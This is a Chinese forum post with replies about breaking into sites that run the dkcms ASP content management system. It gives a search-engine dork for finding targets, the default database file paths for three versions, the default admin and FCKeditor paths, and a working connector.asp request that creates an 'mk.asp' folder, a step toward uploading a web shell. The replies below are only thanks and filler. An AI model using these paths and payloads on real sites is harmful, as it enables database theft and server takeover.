动科(dkcms)漏洞

admin · 发表于 2013-1-18 10:24:26

主要是差不多3个版本为主，v2.0 v3.1 v4.2

谷歌关键字：powered by dkcms
官网竟然找不到源码下载，就百度了，下载了这3款源码，因为是asp的源码，大多都是看看默认数据库，一下是三款默认数据库
V2.0 data/dkcm_ssdfhwejkfs.mdb
V3.1 _data/___dkcms_30_free.mdb
V4.2 _data/I^(()UU()H.mdb
默认后台：admin
编辑器：admin/fckeditor
这些都是，由此可见，官方安全意识挺差的，至于后台拿shell，fck编辑器突破可拿shell
建立asp文件夹
Fck的路径：

Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp
BY:Morker

添仔仔 · 发表于 2014-10-18 06:48:24

不错，感谢楼主

我是小盆友 · 发表于 2014-10-20 08:36:26

朕要休息了..............

你玩会十分 · 发表于 2014-10-27 03:40:04

先顶后看

显示全部楼层 · 发表于 2014-11-6 14:11:27

提示: 作者被禁止或删除内容自动屏蔽

阿蒙 · 发表于 2014-11-19 00:14:43

不错不错,我喜欢看

刘子豪 · 发表于 2014-12-6 18:18:53

楼主也是培训师吗

春伟优 · 发表于 2014-12-29 23:36:40

我是来收集资料滴...

逗逼贱 · 发表于 2015-1-29 22:54:59

呵呵,支持一下哈

随随便便 · 发表于 2015-3-4 02:21:20

一个人最大的破产是绝望，最大的资产是希望。

°独嗳メ该用户已被删除	发表于 2014-11-6 14:11:27 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
°独嗳メ该用户已被删除
	回复支持反对使用道具举报显身卡

动科(dkcms)漏洞

浏览过的版块